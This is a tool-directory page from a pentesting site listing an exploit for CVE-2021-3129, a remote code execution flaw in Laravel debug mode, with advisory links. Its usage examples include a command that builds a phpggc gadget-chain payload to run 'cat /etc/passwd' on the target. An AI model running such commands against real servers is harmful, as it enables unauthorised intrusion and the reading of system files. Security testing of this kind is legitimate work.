Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-3129 — Laravel debug mode - Remote Code Execution (RCE) | Kitploit
Tools/GitHubGitHub/hupe1980/cve-2021-3129
Vulnerability AnalysisCode AnalysisDynamic Code Analysis (DAST)ExploitationWeb Application ExploitationPenetration Testing
GitHubhupe1980/cve-2021-3129

CVE-2021-3129

Laravel debug mode - Remote Code Execution (RCE)

View Repository
73 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-3129

Laravel debug mode - Remote Code Execution (RCE)

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3129
  • https://www.ambionics.io/blog/laravel-debug-rce
  • https://github.com/ambionics/phpggc

Example

root@kitploit:~
python3 exploit.py http://127.0.0.1:8080
root@kitploit:~
python3 exploit.py http://127.0.0.1:8080 --phar $(php -d phar.readonly=off -d phar.require_hash=off ./phpggc --phar phar -f monolog/rce1 system 'cat /etc/passwd' | base64 -w 0)
Download Tool